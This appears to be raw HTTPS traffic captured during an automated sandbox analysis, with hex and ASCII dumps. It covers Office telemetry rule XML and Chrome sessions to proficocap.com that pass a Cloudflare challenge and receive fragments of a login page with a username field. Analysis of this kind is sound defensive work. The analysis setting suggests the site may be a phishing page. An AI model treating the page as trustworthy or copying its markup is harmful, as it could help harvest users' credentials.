                                                                          Last-Modified: Sat, 07 Dec 2024 15:08:57 GMT
                                                                          ETag: "0x8DD16D112C941E3"
                                                                          x-ms-request-id: 2bf777ac-301e-0099-29dd-486683000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195112Z-r1cf579d778lntp7hC1EWR9gg400000005tg000000001svf
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:12 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                          2024-12-08 19:51:12 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.449799172.67.215.2084431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC588OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:13 UTC928INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:51:13 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: D4Q1Trsaimu1XDNYJKOZ6vl2ixPWOjPg53U=$5hbk4CYwHNdbjGwH
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaBa%2Bcls9XuXgYmrVEVw9n%2Bhi9%2F%2BAQrzF8U5ipv6RCLOiYa8iAIomZnG2OE7fSb0hTmYyr8zHA5IYWMJ9z%2BjRGX38WSfY%2Fa54ZhR3f2UUb0bgXN7iYKX3K6%2B1h3zxKm6cQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49f2cb26f795-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1765&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1166&delivery_rate=1607044&cwnd=159&unsent_bytes=0&cid=a3f6a1bbad34f139&ts=653&x=0"
                                                                          2024-12-08 19:51:13 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.449800104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:12 UTC1199OUTPOST / HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 6061
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-arch: "x86"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          sec-ch-ua-model: ""
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          Origin: https://proficocap.com
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: https://proficocap.com/?__cf_chl_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQ
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:12 UTC6061OUTData Raw: 32 64 61 31 66 63 32 64 39 36 66 33 35 31 39 63 36 34 36 61 33 32 38 63 34 35 31 34 36 30 32 36 34 33 34 66 34 34 65 39 37 62 36 66 35 39 64 37 36 39 36 31 66 39 32 33 39 36 32 35 34 39 39 33 3d 44 67 4c 34 31 59 4a 50 74 71 38 6a 64 49 70 38 4e 62 44 41 4f 57 41 32 64 57 4f 71 4a 45 44 73 4e 34 39 57 4d 65 6a 4e 33 46 6b 2d 31 37 33 33 36 38 37 34 32 38 2d 31 2e 32 2e 31 2e 31 2d 69 5f 55 73 54 78 65 64 4b 5f 72 41 4c 4e 64 7a 56 6a 33 45 38 33 74 62 61 33 55 70 6d 38 33 55 6f 4c 6f 43 35 32 6b 67 74 68 6b 44 6c 74 31 49 6b 34 33 78 63 70 54 52 4e 59 71 46 6e 38 49 77 51 4d 6e 70 68 39 74 41 53 36 33 42 5f 5f 35 41 6f 34 6f 6b 59 73 65 79 4e 75 58 30 33 45 38 69 6e 6e 32 55 68 56 41 4c 6d 57 56 69 33 34 46 62 5f 4c 48 5f 74 2e 65 47 4c 30 71 4b 32 46 52
                                                                          Data Ascii: 2da1fc2d96f3519c646a328c45146026434f44e97b6f59d76961f92396254993=DgL41YJPtq8jdIp8NbDAOWA2dWOqJEDsN49WMejN3Fk-1733687428-1.2.1.1-i_UsTxedK_rALNdzVj3E83tba3Upm83UoLoC52kgthkDlt1Ik43xcpTRNYqFn8IwQMnph9tAS63B__5Ao4okYseyNuX03E8inn2UhVALmWVi34Fb_LH_t.eGL0qK2FR
                                                                          2024-12-08 19:51:13 UTC1357INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:13 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.proficocap.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                                          Set-Cookie: cf_clearance=o_FJwQFAkyKFmUfmCGrp5TpCszyZBTMGgkbbHcC0MJY-1733687428-1.2.1.1-E0tdvG5qU6joew2YeI5KK3iuI971.BRkINBn1h9fKLqaKXgnQY7PV.z5AdfIosOC8UgRmCdnMP1owNKw5BbcgrQAlonghYLs66L2eOJ2lE8IiN_r_uFDjBjx4mw6UI4.oZDtesnuw019pqf.R50Z1TMVUw8rXYe7mXWU6DBaygKSDboZ4p4MDm1BYhaGzSGAgnJvWpUh4mn8pie3rGayBXdqnGegbf0yBPIYQla7Y6fc.Xc2JQPf0DKQuaXG4QGoybz85baQwEWK7KEgkvPcJ2ys6WT4XUnUm0PuWVeGUcqmbzssMuL5QK2hmdJ_AzzeHfsLmzVhKXczhqymP5Kkj5pvIvS68vmv3bGYbyu92ZRlW08FaHQuhM8nLtNFE5qtaV0mmzz9APdPYjE5N3I3hltM0Hx5tc37pmGYorhZWRqyH9N2Y6yf3FHD0DVcV79d; Path=/; Expires=Mon, 08-Dec-25 19:51:13 GMT; Domain=.proficocap.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                          Last-Modified: Sat, 07 Dec 2024 20:16:00 GMT
                                                                          Accept-Ranges: bytes
                                                                          X-Powered-By: ASP.NET
                                                                          X-Powered-By-Plesk: PleskWin
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYmntC%2FcD10lxgaAhlff%2Ff9ho3LrZqPX0Y6lGu6F%2ByYlSJxmge5No%2FSnJBL2ETxUu9n%2FDGXYTd%2BobgO%2Fx88HKGkiv3%2FN%2BqN1Rz5foS4Klr2rCIoU7ZUd3SpsUyVGb1O2Kw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          2024-12-08 19:51:13 UTC364INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 65 66 34 39 66 31 66 66 37 32 63 33 36 30 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 36 38 26 6d 69 6e 5f 72 74 74 3d 31 35 36 32 26 72 74 74 5f 76 61 72 3d 35 39 38 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 31 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f
                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eef49f1ff72c360-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1562&rtt_var=598&sent=7&recv=13&lost=0&retrans=0&sent_
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 32 35 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 33 2e 30 2d 61 6c 70 68 61 31 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74
                                                                          Data Ascii: 2577<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/boot
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: flex; align-items: center; justify-content: center; margin-bottom: 20px; position: relative; } .header-container img { position: absolute; top: 0;
                                                                          2024-12-08 19:51:13 UTC1369INData Raw: 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 73 65 72 6e 61 6d 65 22 20 64 69 73 61 62 6c 65 64 3d 22 64 69 73 61 62 6c 65 64 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 61 75 74 6f 66 6f 63 75 73 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 2d 33 22 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: span> <input type="text" class="form-control" id="username" placeholder="Username" disabled="disabled" autofocus="autofocus" required> </div> </div> <div class="mb-3">
